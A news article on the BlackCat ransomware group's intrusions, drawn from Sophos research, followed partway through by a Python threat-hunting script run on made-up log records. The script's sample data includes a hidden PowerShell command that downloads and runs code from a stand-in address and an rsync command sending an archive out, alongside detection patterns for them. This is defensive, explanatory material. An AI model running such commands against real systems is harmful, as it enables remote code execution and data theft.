Gangs Target Big Businesses in the U.S., Europe, and Asia

The ransomware gang behind BlackCat has added Brute Ratel, a pentesting tool with remote access features, to its updated arsenal.

Sophos’ threat researchers say they have been following this ransomware organisation since December 2021, when they were called in to investigate at least five attacks that used this ransomware.

They noted that these attacks took place at large firms across many industry sectors throughout the U.S., Europe, and Asia.

They discovered during their investigation that the attackers were downloading and running Cobalt Strike beacons on some vulnerable PCs using PowerShell commands. The researchers also found that the attackers used Brute Ratel, a tool with “Cobalt Strike-like remote access features.”

According to Christopher Budd, senior manager of threat research at Sophos, “what we’re witnessing with BlackCat and other attacks recently is that threat actors are incredibly efficient and effective in their job.” He explains how they still have success using tried-and-true techniques like exploiting weak firewalls and VPNs. However, they also develop new techniques to get beyond security measures, such as using the more recent post-exploitation C2 framework Brute Ratel in their attacks.

ALPHV is another name for the BlackCat ransomware-as-a-service organisation, which could be a rebrand of the DarkSide or BlackMatter ransomware groups. The malware was written in Rust, a programming language known for fast performance and built-in defences against certain classes of memory-safety flaws. Analysis by security company Varonis reveals that the organisation is aggressively recruiting operators with the promise that affiliates can keep 90% of the ransom paid by victims.

In June, the University of Pisa became a victim of the BlackCat ransomware. The university’s IT system was apparently taken over by the ransomware gang, who then demanded a $4.5 million payment.

The attackers claim that the ransom is a “discount price” that, if not paid immediately, will rise to $5 million. A screenshot of the purported ransom notes, which displays a clock counting down the seconds until the price increases, was also provided by an Italian news site (see: BlackCat Attacks University of Pisa, Demands $4.5M Ransom).

Investigation Details

Using BlackCat, ransomware groups can gain access to large enterprise networks. Researchers discovered that the groups exploit unpatched vulnerabilities in firewall/VPN devices that were first disclosed in 2018. In at least two instances, they pivoted to internal systems after gaining a foothold on the firewall.

According to Sophos researchers, in two of the attacks, “the attackers used a vulnerability that was reported last year to target the product of a different firewall provider.”

But in one instance, Sophos researchers discovered that the flaws allowed attackers to get VPN credentials from the firewall devices and use them to log in to the VPN as authorised users.

“For these VPNs, none of the targets employed multifactor authentication. The lone exception seems to have been a spear-phishing assault that gave the attackers access to an internal user’s VPN login credentials,” according to Andrew Brandt, head of research at SophosLabs. Once inside the network, the attackers mostly moved between computers via RDP, then used the VPN connection to launch brute-force attacks against the Administrator account on network workstations.

The ransomware software is intended to attack VMware ESXi hypervisor servers but has the ability to propagate laterally to Windows computers.

In another instance, Sophos incident responders created a fresh set of credentials after removing a compromised VPN account from the firewall. The researchers saw that the attackers continued to try to encrypt PCs, used the same exploit a second time, and succeeded in obtaining the newly created credentials.

Using Remote Access Tools

Once inside a network, the attackers install a variety of remote access tools on a system that is connected to it. This offers them backup ways to connect remotely to their targets’ networks.

According to Sophos investigators, the attackers installed ngrok, an open-source remote access tool, in addition to using commercial remote access programmes such as AnyDesk and TeamViewer.

Additionally, Brandt notes that the attackers utilised PowerShell commands to download and run Cobalt Strike beacons on some workstations as well as the more modern pentesting programme Brute Ratel, which has functionality similar to Cobalt Strike’s remote access capabilities.

Researchers from Sophos discovered that the Brute Ratel binary was set up on a compromised computer as a Windows service called wewe.

The fact that some of the targeted firms were using the same servers that had been infected using the Log4j vulnerability presented one of the major hurdles for the Sophos investigators.

Along with encrypting network systems, the threat actors also exfiltrated sensitive material from the targets, collected massive amounts of data, and transferred it to Mega, a cloud storage service.

According to the researchers, the attackers used a third-party programme called DirLister to compile a list of accessible directories and files, or in some cases, they used a PowerShell script from a pentester toolkit called PowerView.ps1 to enumerate the network’s computers. In other instances, they employed a programme called LaZagne to extract passwords saved on various devices.

After gathering the files, the threat actors used WinRAR to compress them into .rar archives and rsync to upload the stolen material.
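The two behaviours reported above, Brute Ratel installed as a Windows service named wewe and the WinRAR-then-rsync exfiltration chain, can be hunted for in endpoint telemetry. The following detection logic is an added example, not code from Sophos or from this article; it runs over constructed records in a simplified event shape (Event ID 7045 service installs and 4688 process creations), and the host names, paths and addresses are made up.

```python
"""Hunt constructed Windows log records for the post-exploitation chain described
in the article: a suspicious service install, a PowerShell download cradle,
WinRAR archiving followed by rsync exfiltration from the same host."""
import re
from collections import defaultdict

# Constructed sample records (host, event_id, fields); not real telemetry.
EVENTS = [
    {"host": "esx-mgmt01", "id": 7045, "service": "wewe",
     "image": "C:\\Users\\Public\\wewe.exe"},
    {"host": "esx-mgmt01", "id": 7045, "service": "Sophos Endpoint Defense",
     "image": "C:\\Program Files\\Sophos\\Endpoint Defense\\SEDService.exe"},
    {"host": "ws-042", "id": 4688, "process": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX(New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.9/b')"},
    {"host": "ws-042", "id": 4688, "process": "WinRAR.exe",
     "cmdline": "WinRAR.exe a -r C:\\Temp\\fin.rar \\\\fs01\\finance"},
    {"host": "ws-042", "id": 4688, "process": "rsync.exe",
     "cmdline": "rsync -avz C:\\Temp\\fin.rar user@203.0.113.9:/backup"},
    {"host": "ws-007", "id": 4688, "process": "WinRAR.exe",
     "cmdline": "WinRAR.exe a C:\\Users\\bob\\photos.rar C:\\Users\\bob\\Pictures"},
]

# Service binaries outside these directories are treated as suspicious.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b", re.I)

def hunt(events):
    """Return (host, finding, detail) tuples for the behaviours above."""
    findings = []
    staged = defaultdict(set)  # host -> .rar paths written by WinRAR
    for e in events:
        if e["id"] == 7045:
            name, image = e["service"], e["image"].lower()
            # Short, meaningless names and non-standard paths both stand out.
            if not image.startswith(TRUSTED_DIRS) or len(name) <= 4:
                findings.append((e["host"], "suspicious-service", name))
        elif e["id"] == 4688:
            proc, cmd = e["process"].lower(), e["cmdline"]
            if proc == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
                findings.append((e["host"], "ps-download-cradle", cmd[:40]))
            elif proc == "winrar.exe":
                for archive in re.findall(r"\S+\.rar", cmd, re.I):
                    staged[e["host"]].add(archive.lower())
            elif proc == "rsync.exe":
                # Only fire when rsync touches an archive WinRAR staged on this host.
                if any(a in cmd.lower() for a in staged[e["host"]]):
                    findings.append((e["host"], "rar-then-rsync-exfil", cmd[:40]))
    return findings
```

The benign Sophos service and the lone WinRAR run on ws-007 are included as negative cases so the correlation, not the individual tool, drives the exfiltration alert.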

Sophos analysts said they found evidence that the attackers had broken into the network months before the investigation began. They could also see that the attackers had “cryptominer software on 16 servers inside the corporate network in early November.”
